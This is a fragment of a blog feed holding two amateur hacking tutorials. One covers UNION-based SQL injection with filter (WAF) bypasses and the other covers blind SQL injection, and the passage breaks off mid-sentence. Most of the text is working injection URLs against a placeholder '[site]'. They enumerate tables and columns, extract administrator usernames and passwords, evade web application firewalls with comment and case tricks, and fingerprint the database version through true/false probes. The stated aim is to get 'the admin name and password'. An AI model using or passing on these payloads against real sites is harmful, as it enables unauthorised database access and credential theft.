style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;tbl_admins, ..&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Lets say i have a administrator table.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: green; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;6. Select column names:&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1+union+select+1,group_concat(column_name),3+from+information_schema​.columns+where+table_name="administrator"--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;You couild use the limit here to. "limit+0,1--"&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;if you do not see all columns.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;If you get an error "DO NOT BE SCARED" it is not lost.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Its a hex:&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.swingnote.com/tools/texttohex.php" style="-webkit-background-clip: padding-box; background-color: white; color: #308cff; font-family: sans-serif; font-size: 13px; line-height: 18px; outline-color: initial; outline-style: none; outline-width: initial; text-align: center; text-decoration: none;" target="_blank"&gt;http://www.swingnote.com/tools/texttohex.php&lt;/a&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Place the table name my case: administrator where it says:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Say hello to my little friend!&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Translate: 61646d696e6973747261746f72 (administrator)&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;this is my hex.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;How to ad it to a link. Wel, where u now have ble_name&lt;/span&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: center;"&gt;="administrator"&lt;/span&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;--+-&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;At the end of your link. We need to change to this. ble_name=&lt;/span&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: center;"&gt;0x&lt;/span&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;--+-&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;And place the hex behind the 0x.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1+union+select+1,group_concat(column_name),3+from+information_schema​.columns+where+table_name=0x61646d696e6973747261746f72--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Now you should see alot of names again. Look for username and password or email/password or name/pass whatever relates.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Mines are user and pass.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;How do we select these. Not that hard at all.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;We use the group_concat(user,0x3a,pass) 0x3a is nessesairy it means colon.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;At the end: +from+db_1.administrator&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;The db_1 is the database we searched at start.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;And, you do not need to use a hex now!&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;As following:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1+union+select+1,group_concat(user,0x3a,pass),3+from+db_1.administra​tor--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;If annything went good? You should now have the admin name and password.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: green; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;7. WAF bypassing. (basics)&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;When you have an error using the union select statement.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;It is most likely because the admins made an attempt to secure against sqli.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Those admins fail...&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;So we have to make sure we can actually use the union statement.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;to get what we need. a basic example: /*!union*/+/*!select*/&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;the /*! */ is bypassing the WAF because they only ignored union+select.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1+/*!union*/+/*!select*/+1,2,3--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;If all good we should get the vulnerable numbers now.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;There are many ways to bypass WAF.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;example: un&amp;gt;ion+sel&amp;gt;ect&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;or: UnIoN+SeLeCt&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Now we bypassed it? we still need information from the columns.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1+/*!union*/+/*!select*/+1,CoNcAt(version()),3--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;This should get you the version.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Same for database.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Now we need tables.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1+/*!union*/+/*!select*/+1,GrOuP_CoNcAt(/*!table_name*/),3+FrOm+/*!information_schema*/.TaBlEs+WhErE+/*!table_schema*/=database()--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br class="Apple-interchange-newline" /&gt;&lt;span class="fullpost"&gt;  &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;copyright@2007 saifulfaizan&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23134681-2554452555892276150?l=www.saifulfaizan.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/23134681/posts/default/2554452555892276150'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/23134681/posts/default/2554452555892276150'/><link rel='alternate' type='text/html' href='http://www.saifulfaizan.com/2011/12/basic-sql-injection-string-injection.html' title='Basic sql injection String Injection'/><author><name>x-CODE-shadow</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_MmkIH6WGbYI/R4q6vasF8zI/AAAAAAAAAGY/x1TYR1MoOrE/S220/DSCI0128.JPG'/></author></entry><entry><id>tag:blogger.com,1999:blog-23134681.post-5733812613289398509</id><published>2011-12-16T22:45:00.000+08:00</published><updated>2011-12-16T22:45:25.545+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Paper N Tutorial'/><title type='text'>Blind sql Injection. (ascii char)</title><content type='html'>&lt;span style="background-color: white; color: orange; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Checking vulnerability&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Lets start, In what cases do we know if it really is a blind injectable site only?&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Wel, you have a site. same as normal injection whit php?if= of pfp?f= of other stuff.. dous not mather.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we want to check if he is vulnerable. so we put and 1=1 behind the id number.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;that is always true. ib this case we do not get an error,&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;now the real test: instead of 1=1 use and 1=2&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=1+and+1=2&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;If we see any text missing or image movement.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;or an error like this: invalid id or db_error select * from [site]@localhost call line... blah blah blah.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;This means it is vulnerable.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;do not forget: and 1=1 means true. page wil return unharmed.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;and 1=2 is false. page returns in error or moved content.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: orange; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Finding the mysql version of the site.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;sinse it is blind sqli... the site will not pop up the version when you put version() no it needs more.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;It always needs..&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Using the substring(@@version,1,1) is asking if the =4 is true. so we ask database. hey database, is this a version 4 you use.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Database is like No wtf i'm awesome. (he returns false.)&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;That means instead of =4 put =5&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=1 and substring(@@version,1,1)=5&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Database returns true. (page is normal)&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;this means its a version 5 database.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: orange; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;gambling columns and tables..&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Yeeey people, we moved on to the fun stuff. guessing tables and columns.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;since database only sais true or false. we gonna ask our little friend the database everything.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Blind sqli is not that hard. but 